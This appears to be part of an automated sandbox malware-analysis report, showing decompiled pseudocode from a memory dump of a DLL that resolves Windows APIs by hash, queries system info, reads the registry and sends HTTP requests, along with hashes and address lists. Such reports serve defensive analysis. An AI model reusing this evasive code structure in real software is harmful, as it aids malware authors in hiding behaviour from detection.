0x6e7ac537
0x6e7ac53b
0x00000000
0x6e7ac4d2
0x6e7ac4d4
0x6e7ac510
0x6e7ac510
0x6e7ac511
0x6e7ac517
0x6e7ac3ba
0x00000000
0x6e7ac51d
0x00000000
0x6e7ac51d
0x6e7ac4d6
0x6e7ac4d8
0x6e7ac4e3
0x6e7ac4df
0x6e7ac4df
0x6e7ac4df
0x6e7ac4ea
0x00000000
0x6e7ac4ec
0x6e7ac4f6
0x6e7ac4fa
0x6e7ac4ff
0x6e7ac504
0x00000000
0x6e7ac506
0x6e7ac506
0x6e7ac507
0x6e7ac50b
0x6e7ac50c
0x6e7ac50c
0x6e7ac504
0x6e7ac4ea
0x6e7ac4d4
0x6e7ac4cb
0x00000000
0x6e7ac450
0x6e7ac3fc
0x6e7ac3fd
0x6e7ac401
0x6e7ac402
0x6e7ac403
0x6e7ac404
0x00000000
0x6e7ac404
0x6e7ac335
0x6e7ac335
0x6e7ac337
0x6e7ac33b
0x6e7ac36c
0x6e7ac36c
0x6e7ac373
0x6e7ac377
0x6e7ac37c
0x6e7ac387
0x6e7ac33d
0x6e7ac33d
0x6e7ac342
0x6e7ac34d
0x6e7ac349
0x6e7ac349
0x6e7ac349
0x6e7ac354
0x00000000
0x6e7ac356
0x6e7ac360
0x6e7ac367
0x00000000
0x6e7ac369
0x6e7ac369
0x6e7ac36a
0x6e7ac36b
0x6e7ac36b
0x6e7ac367
0x6e7ac354
0x6e7ac33b
0x00000000

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f17b59286eec2a0a04a93962903cfa7af11a798c4da61e5b2bbe808ff438f0cb
Instruction ID: 8b48c631aa5b7c1c59f6c4415c72c7528d64f78b59f917e10d615b2d844c5a52
Opcode Fuzzy Hash: f17b59286eec2a0a04a93962903cfa7af11a798c4da61e5b2bbe808ff438f0cb
Instruction Fuzzy Hash: F261E631508301AFD704DFA9CA94A5FB7E9AFC4354F118B6DEA599F260EB30D805CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E79430F, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E79430F(void* __eax, intOrPtr __ebx, void* __esi, void* __ebp, char _a4, struct _SYSTEM_INFO _a344, intOrPtr _a356, intOrPtr _a360, intOrPtr _a364, short _a372, intOrPtr _a380, char _a384, char _a388, char _a400, char _a404, char _a408) {
				char _v0;
				void* _v4;
				char _v16;
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t64;
				void* _t69;

				_t47 = __ebx;
				if(__eax == 0) {
					E6E7A9510( &_a4);
					if(_a408 != 0) {
						E6E7ABE30( &_a404, __esi);
					}
				} else {
					__edx =  *0x6e7bb1f4; // 0xeb1340
					if(__edx == 0xc139578) {
						 *0x6e7bb1f4 = 0;
						L26:
						__eax = 0x3ab94787;
						_push(0x3ab94787);
						_v4 = E6E797564(0x3ab94787);
						if(_v4 == 0) {
							__ecx = 0x3ab94787;
							__eax = E6E796C50(0x3ab94787);
							if(__al != 0) {
								__eax = 0x3ab94787;
								_push(0x3ab94787);
								 *__esp = E6E797564(0x3ab94787);
							}
						}
						if(_v4 == 0) {
							L42:
							__ecx =  &_v0;
							__eax = E6E7A9510( &_v0);
							if(_a404 != 0) {
								__ecx =  &_a400;
								__eax = E6E7ABE30( &_a400, __esi);
							}
							goto L1;
						} else {
							__esp = __esp + 0xfffffff8;
							__edx = 0xc4b8bd35;
							__eax = _v4;
							__edx = E6E7967C8(_v4, 0xc4b8bd35);
							L29:
							if(__edx == 0) {
								goto L42;
							}
							 *__edi & 0x000000ff = ( *__edi & 0x000000ff) - 1;
							__eax =  *__edx( *__esi, ( *__edi & 0x000000ff) - 1);
							if(__eax == 0) {
								goto L42;
							}
							__eax =  *__eax;
							if(__eax == 0) {
								__esi = 1;
							} else {
								if(__eax == 0x1000) {
									__esi = 2;
								} else {
									if(__eax == 0x2100) {
										__esi = 4;
									} else {
										if(__eax == 0x2000) {
											__esi = 3;
										} else {
											if(__eax == 0x3000) {
												__esi = 5;
											} else {
												if(__eax != 0x4000) {
													__esi = 7;
													__esi =  !=  ? __ebx : 7;
												} else {
													__esi = 6;
												}
											}
										}
									}
								}
							}
							__ecx =  &_v16;
							__eax = E6E7A9510( &_v16);
							if(_a388 != 0) {
								__ecx =  &_a384;
								__eax = E6E7ABE30( &_a384, __esi);
							}
							L2:
							_t35 =  *0x6e7bb1f0; // 0xeb0528
							 *((intOrPtr*)(_t35 + 0x2c)) = _t64;
							_t56 =  *0x6e7bb1f4; // 0xeb1340
							if(_t56 == 0xc139578) {
								 *0x6e7bb1f4 = 0;
								L9:
								_push(0xa1310f65);
								_t48 = E6E797564(0xa1310f65);
								if(_t48 == 0) {
									if(E6E796C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t48 = E6E797564(0xa1310f65);
									}
								}
								if(_t48 == 0) {
									goto L14;
								} else {
									_t69 = _t69 + 0xfffffff8;
									_t59 = E6E7967C8(_t48, 0x4e85f18d);
									goto L12;
								}
							} else {
								if(_t56 == 0) {
									goto L9;
								} else {
									goto L5;
								}
								do {
									L5:
									_t54 = _t47;
									_t45 = _t54;
									while( *((intOrPtr*)(_t45 + _t56 + 8)) != 0x4e85f18d) {
										_t54 = _t54 + 1;
										_t45 = _t45 + 0x18;
										if(_t54 < 0x10) {
											continue;
										}
										goto L8;
									}
									_t59 =  *((intOrPtr*)(_t45 + _t56 + 0x14));
									if(_t59 != 0) {
										L12:
										if(_t59 != 0) {
											GetSystemInfo( &_a344);
										}
										L14:
										_t39 =  *0x6e7bb1f0; // 0xeb0528
										 *((short*)(_t39 + 0xe)) = _a372;
										 *((intOrPtr*)(_t39 + 0x10)) = _a356;
										 *((intOrPtr*)(_t39 + 0x14)) = _a360;
										 *((intOrPtr*)(_t39 + 0x18)) = _a364;
										 *((intOrPtr*)(_t39 + 0x1c)) = _a380;
										return _t39;
									} else {
										goto L9;
									}
									L8:
									asm("o16 nop [eax+eax]");
									_t4 = _t56 + 0x180; // 0xeb8e68
									_t56 =  *_t4;
								} while (_t56 != 0);
								goto L9;
							}
						}
					}
					if(__edx == 0) {
						goto L26;
					} else {
						goto L22;
					}
					do {
						L22:
						__ecx = __ebx;
						__eax = __ecx;
						while( *((intOrPtr*)(__eax + __edx + 8)) != 0xc4b8bd35) {
							__ecx = __ecx + 1;
							__eax = __eax + 0x18;
							if(__ecx < 0x10) {
								continue;
							}
							goto L25;
						}
						__edx =  *((intOrPtr*)(__eax + __edx + 0x14));
						if(__edx != 0) {
							goto L29;
						}
						goto L26;
						L25:
						asm("o16 nop [eax+eax]");
						_t20 = __edx + 0x180; // 0xeb8e68
						__edx =  *_t20;
					} while (__edx != 0);
					goto L26;
				}
				L1:
				_t64 = _t47;
				goto L2;
			}

0x6e79430f
0x6e794313
0x6e79444c
0x6e794459
0x6e794466
0x6e794466
0x6e794319
0x6e794319
0x6e794325
0x6e7944f6
0x6e79435a
0x6e79435a
0x6e79435f
0x6e794365
0x6e79436c
0x6e7944c0
0x6e7944c5
0x6e7944cc
0x6e7944d2
0x6e7944d7
0x6e7944dd
0x6e7944dd
0x6e7944cc
0x6e794376
0x6e794420
0x6e794420
0x6e794424
0x6e794431
0x6e794437
0x6e79443e
0x6e79443e
0x00000000
0x6e79437c
0x6e79437c
0x6e79437f
0x6e794384
0x6e79438d
0x6e79438f
0x6e794391
0x00000000
0x00000000
0x6e79439a
0x6e79439e
0x6e7943a2
0x00000000
0x00000000
0x6e7943a4
0x6e7943a8
0x6e7944b6
0x6e7943ae
0x6e7943b3
0x6e7944ac
0x6e7943b9
0x6e7943be
0x6e7944a2
0x6e7943c4
0x6e7943c9
0x6e794498
0x6e7943cf
0x6e7943d4
0x6e7943f3
0x6e7943d6
0x6e7943db
0x6e7943e4
0x6e7943ee
0x6e7943dd
0x6e7943dd
0x6e7943dd
0x6e7943db
0x6e7943d4
0x6e7943c9
0x6e7943be
0x6e7943b3
0x6e7943f8
0x6e7943fc
0x6e794409
0x6e79440f
0x6e794416
0x6e794416
0x6e794042
0x6e794042
0x6e794047
0x6e79404a
0x6e794056
0x6e7941cf
0x6e79408b
0x6e794090
0x6e794096
0x6e79409a
0x6e7941a6
0x6e7941b1
0x6e7941b7
0x6e7941b7
0x6e7941a6
0x6e7940a2
0x00000000
0x6e7940a4
0x6e7940ab
0x6e7940b3
0x00000000
0x6e7940b3
0x6e79405c
0x6e79405e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794060
0x6e794060
0x6e794060
0x6e794062
0x6e794064
0x6e794072
0x6e794073
0x6e794079
0x00000000
0x00000000
0x00000000
0x6e794079
0x6e7941be
0x6e7941c4
0x6e7940b5
0x6e7940b7
0x6e7940c1
0x6e7940c1
0x6e7940c3
0x6e7940c3
0x6e7940eb
0x6e7940ef
0x6e7940f2
0x6e7940f5
0x6e7940f8
0x6e794107
0x6e7941ca
0x00000000
0x6e7941ca
0x6e79407b
0x6e79407b
0x6e794081
0x6e794081
0x6e794087
0x00000000
0x6e794060
0x6e794056
0x6e794376
0x6e79432d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79432f
0x6e79432f
0x6e79432f
0x6e794331
0x6e794333
0x6e794341
0x6e794342
0x6e794348
0x00000000
0x00000000
0x00000000
0x6e794348
0x6e7944e5
0x6e7944eb
0x00000000
0x00000000
0x00000000
0x6e79434a
0x6e79434a
0x6e794350
0x6e794350
0x6e794356
0x00000000
0x6e79432f
0x6e794040
0x6e794040
0x00000000

APIs

GetSystemInfo.KERNELBASE(?), ref: 6E7940C1

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 5536a52227686e69d4b827e81b83af455de369e5264414468b63d44877c799d5
Instruction ID: 1ba68c4db78544ae960e1c6bec98599ceaef45d7dc3e47917ccd177c566baf30
Opcode Fuzzy Hash: 5536a52227686e69d4b827e81b83af455de369e5264414468b63d44877c799d5
Instruction Fuzzy Hash: 3651E6306042428BE7548EA9F6E47AA7296AF81304F15867DC578972B5FB34D843FB42

Uniqueness

Uniqueness Score: -1.00%

Function 6E7B3820, Relevance: 1.7, APIs: 1, Instructions: 151
networkCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E7B3820(intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				long _t52;
				int _t53;
				intOrPtr _t59;
				void* _t67;
				intOrPtr* _t95;
				intOrPtr _t102;
				intOrPtr _t104;
				void* _t105;
				intOrPtr* _t107;
				void* _t109;
				intOrPtr* _t110;

				_t110 = _t109 - 0x60;
				_t107 = __ecx;
				_t39 =  *((intOrPtr*)(__ecx + 8));
				if(_t39 == 0 || _t39 == 0xffffffff) {
					_t40 = 1;
				} else {
					_t40 = 0;
				}
				if(_t40 != 0) {
					L26:
					_push(0);
					E6E7A9350( *((intOrPtr*)(_t110 + 0x78)));
					return  *((intOrPtr*)(_t110 + 0x74));
				} else {
					_t43 =  *((intOrPtr*)(_t107 + 0x10));
					if(_t43 == 0 || _t43 == 0xffffffff) {
						_t44 = 1;
					} else {
						_t44 = 0;
					}
					if(_t44 != 0) {
						goto L26;
					} else {
						_t75 = _t107 + 0x28;
						E6E7A7660(_t107 + 0x28, _t110 + 0x3c, 0x6e7b9424);
						E6E7987A0(_t110 + 0x44);
						_t48 = E6E7915C0(0xd27f045a, 0x336e58dc);
						_t98 = _t48;
						if(_t48 != 0) {
							 *_t110 =  *((intOrPtr*)(_t107 + 0x10));
							 *((intOrPtr*)(_t110 + 0xc)) =  *((intOrPtr*)(_t110 + 0x44));
							_t102 =  *((intOrPtr*)(_t107 + 0x28));
							 *(_t110 + 8) = E6E7A0180( *((intOrPtr*)(_t110 + 0x44)), 0x7fffffff, _t102);
							if(E6E7A9650( *((intOrPtr*)(_t110 + 0x78))) != 0) {
								 *((intOrPtr*)(_t110 + 4)) = E6E7A9640( *((intOrPtr*)(_t110 + 0x7c)), 0);
							} else {
								 *((intOrPtr*)(_t110 + 4)) = 0;
							}
							_t52 = E6E7A9650( *((intOrPtr*)(_t110 + 0x78)));
							_t103 =  !=  ?  *((void*)(_t110 + 0x18)) : _t102;
							_t53 = HttpSendRequestW( *(_t110 + 0x10),  !=  ?  *((void*)(_t110 + 0x18)) : _t102,  *(_t110 + 0x10),  *(_t110 + 8), _t52); // executed
							if(_t53 == 0) {
								_t104 = E6E797F00();
								E6E7A7560(_t75, _t98, _t104);
								if(_t104 != 0) {
									goto L12;
								} else {
									goto L17;
								}
							} else {
								E6E7A7560(_t75, _t98, _t103);
								L17:
								 *(_t110 + 0x50) = 4;
								_t95 = E6E7915C0(0xd27f045a, 0xcedbd48c);
								if(_t95 == 0) {
									_t59 = 0x7f;
									goto L24;
								} else {
									_t105 = _t110 + 0x50;
									_push(0);
									_push(_t105);
									_push(_t110 + 0x4c);
									_push(0x20000013);
									_push( *((intOrPtr*)(_t107 + 0x10)));
									if( *_t95() == 0) {
										_t59 = E6E797F00();
										if(_t59 != 0) {
											L24:
											 *_t107 = _t59;
											E6E798CA0(_t110 + 0x44);
											goto L25;
										} else {
											goto L19;
										}
									} else {
										L19:
										 *((intOrPtr*)(_t107 + 0x34)) =  *((intOrPtr*)(_t110 + 0x4c));
										E6E798810(_t110 + 0x38, 0x2800);
										 *(_t110 + 0x50) =  *(_t110 + 0x38) >> 1;
										_t67 = E6E7915C0(0xd27f045a, 0xcedbd48c);
										if(_t67 == 0) {
											 *_t107 = 0x7f;
											E6E798CA0(_t110 + 0x34);
											E6E798CA0(_t110 + 0x44);
											goto L25;
										} else {
											_push(0);
											_push(_t105);
											_push( *((intOrPtr*)(_t110 + 0x3c)));
											_push(0x14);
											_push( *((intOrPtr*)(_t107 + 0x10)));
											asm("int3");
											return _t67;
										}
									}
								}
							}
						} else {
							_t104 = 0x7f;
							E6E7A7560(_t75, _t98, 0x7f);
							L12:
							 *_t107 = _t104;
							E6E798CA0(_t110 + 0x44);
							L25:
							E6E7A0B10(_t110 + 0x3c);
							goto L26;
						}
					}
				}
			}

0x6e7b3824
0x6e7b3827
0x6e7b3829
0x6e7b382e
0x6e7b3839
0x6e7b3835
0x6e7b3835
0x6e7b3835
0x6e7b3840
0x6e7b3bba
0x6e7b3bba
0x6e7b3bc0
0x6e7b3bd0
0x6e7b3846
0x6e7b3846
0x6e7b384b
0x6e7b3856
0x6e7b3852
0x6e7b3852
0x6e7b3852
0x6e7b385d
0x00000000
0x6e7b3863
0x6e7b3863
0x6e7b3872
0x6e7b387f
0x6e7b388e
0x6e7b3893
0x6e7b3897
0x6e7b38c2
0x6e7b38c5
0x6e7b38c9
0x6e7b38d1
0x6e7b38e0
0x6e7b3ca0
0x6e7b38e6
0x6e7b38e6
0x6e7b38e6
0x6e7b38f2
0x6e7b3902
0x6e7b390c
0x6e7b3910
0x6e7b3c7f
0x6e7b3c83
0x6e7b3c8a
0x00000000
0x6e7b3c90
0x00000000
0x6e7b3c90
0x6e7b3916
0x6e7b3918
0x6e7b391d
0x6e7b391d
0x6e7b3934
0x6e7b3938
0x6e7b3ba0
0x00000000
0x6e7b393e
0x6e7b393e
0x6e7b3946
0x6e7b3948
0x6e7b3949
0x6e7b394a
0x6e7b394f
0x6e7b3956
0x6e7b3c68
0x6e7b3c6f
0x6e7b3ba5
0x6e7b3ba5
0x6e7b3bac
0x00000000
0x6e7b3c75
0x00000000
0x6e7b3c75
0x6e7b395c
0x6e7b395c
0x6e7b3965
0x6e7b396c
0x6e7b3977
0x6e7b3985
0x6e7b398c
0x6e7b3b89
0x6e7b3b90
0x6e7b3b99
0x00000000
0x6e7b3992
0x6e7b3992
0x6e7b3994
0x6e7b3995
0x6e7b3999
0x6e7b399b
0x6e7b399e
0x6e7b399f
0x6e7b399f
0x6e7b398c
0x6e7b3956
0x6e7b3938
0x6e7b3899
0x6e7b389b
0x6e7b38a0
0x6e7b38a5
0x6e7b38a5
0x6e7b38ac
0x6e7b3bb1
0x6e7b3bb5
0x00000000
0x6e7b3bb5
0x6e7b3897
0x6e7b385d

APIs

HttpSendRequestW.WININET(D27F045A,?,D27F045A,?,00000000,D27F045A,336E58DC,?), ref: 6E7B390C

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: b8d9084589365eb1eae299f8c172130dcdd9de3539e60e0947863a1b7116ec20
Instruction ID: 8d209796a3a6cf318fe15de4bff28973e1bd30b7cf57b1b1da4b07a569af0e8b
Opcode Fuzzy Hash: b8d9084589365eb1eae299f8c172130dcdd9de3539e60e0947863a1b7116ec20
Instruction Fuzzy Hash: 2B518030608205BBE7109FA8CE58A9F77E8AF80354F004D2DF9659B2B4EB71D844DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7AC580, Relevance: 1.6, APIs: 1, Instructions: 98
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7AC580(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				int _v20;
				char _v28;
				int* _v32;
				int* _v36;
				char _v40;
				char _v48;
				char _v303;
				void* __edi;
				void* __esi;
				long _t25;
				signed int _t33;
				char _t45;
				int _t62;
				intOrPtr _t63;
				char* _t64;
				char* _t66;

				_v40 = 0;
				_t62 = 0;
				_v36 = 0;
				_t63 = __ecx;
				_v32 = 0;
				_t64 = _t66;
				while(1) {
					_v20 = 0x105;
					if(E6E7915C0(0x3ab94787, 0x31fb9d90) == 0) {
						goto L3;
					}
					_t25 = RegEnumValueA( *(_t63 + 4), _t62, _t64,  &_v20, 0, 0, 0, 0); // executed
					if(_t25 == 0) {
						goto L3;
					}
					_t45 = _v40;
					_t26 = 0;
					if(_t45 <= 0) {
						L9:
						E6E7A0930(_a4, _t26, _t26);
						E6E7A7560( &_v48, _t62, _t63);
						return _v4;
					} else {
						_t63 = _t45;
						_t65 = 0;
						_t62 =  &_v28;
						while(1) {
							E6E7A1240(E6E7A7600( &_v40, _t65), _t62); // executed
							_t40 = _v36;
							_t33 = E6E7AD620(_t40, E6E7A6040(_v36, 0x7fffffff));
							E6E7A0B10(_t62);
							if((_t33 ^ 0x38ba5c7b) == _v0) {
								break;
							}
							_t65 =  &_v303;
							if( &_v303 < _t63) {
								continue;
							} else {
								_t26 = 0;
								goto L9;
							}
							goto L11;
						}
						E6E7A0750(_v0, E6E7A7600( &_v40, _t65));
						E6E7A7560( &_v48, _t62, _t63);
						return _v4;
					}
					L11:
					L3:
					E6E7A37E0( &_v40, _t64, _v40);
					_t62 = _t62 + 1;
				}
			}

0x6e7ac58e
0x6e7ac595
0x6e7ac597
0x6e7ac59e
0x6e7ac5a0
0x6e7ac5a7
0x6e7ac5aa
0x6e7ac5aa
0x6e7ac5c8
0x00000000
0x00000000
0x6e7ac5db
0x6e7ac5df
0x00000000
0x00000000
0x6e7ac5f8
0x6e7ac5ff
0x6e7ac603
0x6e7ac662
0x6e7ac66b
0x6e7ac677
0x6e7ac68d
0x6e7ac605
0x6e7ac607
0x6e7ac609
0x6e7ac60b
0x6e7ac612
0x6e7ac622
0x6e7ac627
0x6e7ac63e
0x6e7ac647
0x6e7ac659
0x00000000
0x00000000
0x6e7ac65b
0x6e7ac65e
0x00000000
0x6e7ac660
0x6e7ac660
0x00000000
0x6e7ac660
0x00000000
0x6e7ac65e
0x6e7ac6a7
0x6e7ac6b3
0x6e7ac6c9
0x6e7ac6c9
0x00000000
0x6e7ac5e1
0x6e7ac5f0
0x6e7ac5f5
0x6e7ac5f5

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,?,00000000,00000000,00000000,00000000,3AB94787,31FB9D90,?,?,3AB94787,31FB9D90), ref: 6E7AC5DB

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 71b1a84cdbfb9666a2904b00dc10ff6c6848b6122441b50c3cd9c2af10e49e24
Instruction ID: 70f0b4566b8ea92d4765a9004a6770a7ae04f5617cf06dc7c86b66c0ae4aa801
Opcode Fuzzy Hash: 71b1a84cdbfb9666a2904b00dc10ff6c6848b6122441b50c3cd9c2af10e49e24
Instruction Fuzzy Hash: A731AF312082445BC375DFADD994AEFB3DDABD8304F104E3DA28983254EF715D458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E7AC405, Relevance: 1.6, APIs: 1, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E7AC405(intOrPtr __eax, void* __edi, intOrPtr __ebp, void* _a8, int _a12, void* _a16, void* _a20, void** _a28, void** _a32, void** _a36, char _a40, unsigned int _a44, char _a48, void** _a52, void* _a64, void* _a68) {
				unsigned int _v0;
				void* _v4;
				unsigned int _v8;
				void* _v20;
				void* _v28;
				void* _t41;
				intOrPtr* _t42;
				void** _t45;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;

				_t51 = __ebp;
				_t49 = __eax;
				if(__eax != 0) {
					_t42 = _a16;
					goto L1;
				} else {
					do {
						__edx =  &_a48;
						__ecx =  &_a40;
						__eax = E6E79A0D0( &_a40,  &_a48);
						__edx = _a44;
						__ecx =  &_a52;
						__eax = E6E7983B0( &_a52);
						__esi = _a52;
						__ecx = __esi;
						__edx = 0x7fffffff;
						__eax = E6E7A6040(__esi, 0x7fffffff);
						__ecx = __esi;
						__edx = __eax;
						__esi = __eax;
						__ecx =  &_a52;
						__eax = E6E7A0B10( &_a52);
						if(__esi != __edi) {
							__ecx =  &_a48;
							__eax = E6E798CA0( &_a48);
							__ebx = __ebx + 1;
							goto L12;
						} else {
							__edi = _a36;
							__ecx =  &_a48;
							__esi =  *(__ecx - 0x10);
							__eax = E6E798CA0(__ecx);
							if(__edi != 0) {
								__ecx =  *(__esp + 0x1c);
								__eax = E6E7996D0( *(__esp + 0x1c), 0x5c);
							}
							__ecx =  *(__esp + 0x20);
							__eax = E6E7A0220( *(__esp + 0x20), _a40, 0);
							_a12 = 0;
							__eax = E6E7915C0(0x3ab94787, 0xd5493f9);
							__edx = __eax;
							if(__eax == 0) {
								__edx = 0;
							} else {
								__eax =  &_a20;
								__ecx =  *(__eax - 0xc);
								__ecx =  ==  ?  *((void*)(__eax - 0x10)) :  *(__eax - 0xc);
								__ebx = __eax[1];
								__eax = RegOpenKeyExW( *(__esp + 0x68),  *(__eax[1]), 0, __ecx, __eax); // executed
								__edx = __eax;
							}
							__ebx = _a20;
							if(__ebx == 0 || __ebx == 0xffffffff) {
								L34:
								__ebx = _a16;
								__esi = __edx;
								L1:
								if( *((char*)(_t42 + 8)) == 0) {
									L9:
									 *((intOrPtr*)(_t42 + 4)) = _t51;
									 *((char*)(_t42 + 8)) = 1;
									E6E798CA0( &_a40);
									 *_t42 = _t49;
									return _t49;
								} else {
									_t48 =  *((intOrPtr*)(_t42 + 4));
									if(_t48 == 0 || _t48 == 0xffffffff) {
										_t45 = 1;
									} else {
										_t45 = 0;
									}
									if(_t45 != 0) {
										goto L9;
									} else {
										_t41 = E6E7915C0(0x3ab94787, 0x91935d4e);
										if(_t41 == 0) {
											goto L9;
										} else {
											_push(_t48);
											asm("int3");
											return _t41;
										}
									}
								}
							} else {
								if(__esi == 0) {
									L30:
									__edi =  &(__edi[0]);
									__ebp = __ebx;
									if(__edi < _a28) {
										__esi = 1;
										__eax = __edi * 4;
										__ecx =  *(__esp + 0x58);
										__eax = E6E7A9640( *(__esp + 0x58), __edi * 4);
										__eax =  *__eax;
										__ebx = 0;
										__eax = __eax ^ 0x38ba5c7b;
										_a32 = __edi;
										__edi = __eax;
										_a28 = 1;
										goto L12;
									} else {
										goto L34;
									}
								} else {
									if(__ebp == 0 || __ebp == 0xffffffff) {
										__eax = 1;
									} else {
										__eax = 0;
									}
									if(__eax != 0) {
										goto L30;
									} else {
										_v0 = __edx;
										__eax = E6E7915C0(0x3ab94787, 0x91935d4e);
										__edx = _v8;
										if(__eax == 0) {
											goto L30;
										} else {
											_push(__ebp);
											_v0 = __edx;
											asm("int3");
											return __eax;
										}
									}
								}
							}
						}
						goto L35;
						L12:
						__eax = E6E7915C0(0x3ab94787, 0xf561ae8b);
					} while (__eax == 0);
					__edx = _a44;
					__edx = _a44 >> 1;
					_push(_a44 >> 1);
					_push(_a40);
					_push(__ebx);
					_push(__ebp);
					asm("int3");
					return __eax;
				}
				L35:
			}

0x6e7ac405
0x6e7ac405
0x6e7ac409
0x6e7ac52e
0x00000000
0x6e7ac40f
0x6e7ac40f
0x6e7ac40f
0x6e7ac414
0x6e7ac418
0x6e7ac41d
0x6e7ac421
0x6e7ac425
0x6e7ac42a
0x6e7ac42e
0x6e7ac430
0x6e7ac435
0x6e7ac43a
0x6e7ac43c
0x6e7ac443
0x6e7ac445
0x6e7ac449
0x6e7ac450
0x6e7ac51f
0x6e7ac523
0x6e7ac528
0x00000000
0x6e7ac456
0x6e7ac456
0x6e7ac45a
0x6e7ac45e
0x6e7ac461
0x6e7ac468
0x6e7ac46c
0x6e7ac470
0x6e7ac470
0x6e7ac47b
0x6e7ac47f
0x6e7ac484
0x6e7ac496
0x6e7ac49b
0x6e7ac49f
0x6e7ac4c3
0x6e7ac4a1
0x6e7ac4a5
0x6e7ac4a9
0x6e7ac4ac
0x6e7ac4b4
0x6e7ac4bd
0x6e7ac4bf
0x6e7ac4bf
0x6e7ac4c5
0x6e7ac4cb
0x6e7ac537
0x6e7ac537
0x6e7ac53b
0x6e7ac337
0x6e7ac33b
0x6e7ac36c
0x6e7ac36c
0x6e7ac373
0x6e7ac377
0x6e7ac37c
0x6e7ac387
0x6e7ac33d
0x6e7ac33d
0x6e7ac342
0x6e7ac34d
0x6e7ac349
0x6e7ac349
0x6e7ac349
0x6e7ac354
0x00000000
0x6e7ac356
0x6e7ac360
0x6e7ac367
0x00000000
0x6e7ac369
0x6e7ac369
0x6e7ac36a
0x6e7ac36b
0x6e7ac36b
0x6e7ac367
0x6e7ac354
0x6e7ac4d2
0x6e7ac4d4
0x6e7ac510
0x6e7ac510
0x6e7ac511
0x6e7ac517
0x6e7ac3ba
0x6e7ac3bf
0x6e7ac3c7
0x6e7ac3cb
0x6e7ac3d0
0x6e7ac3d2
0x6e7ac3d4
0x6e7ac3d9
0x6e7ac3dd
0x6e7ac3df
0x00000000
0x6e7ac51d
0x00000000
0x6e7ac51d
0x6e7ac4d6
0x6e7ac4d8
0x6e7ac4e3
0x6e7ac4df
0x6e7ac4df
0x6e7ac4df
0x6e7ac4ea
0x00000000
0x6e7ac4ec
0x6e7ac4f6
0x6e7ac4fa
0x6e7ac4ff
0x6e7ac504
0x00000000
0x6e7ac506
0x6e7ac506
0x6e7ac507
0x6e7ac50b
0x6e7ac50c
0x6e7ac50c
0x6e7ac504
0x6e7ac4ea
0x6e7ac4d4
0x6e7ac4cb
0x00000000
0x6e7ac3e3
0x6e7ac3ed
0x6e7ac3f2
0x6e7ac3f6
0x6e7ac3fa
0x6e7ac3fc
0x6e7ac3fd
0x6e7ac401
0x6e7ac402
0x6e7ac403
0x6e7ac404
0x6e7ac404
0x00000000

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,00000000,3AB94787,0D5493F9,?,00000000), ref: 6E7AC4BD

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
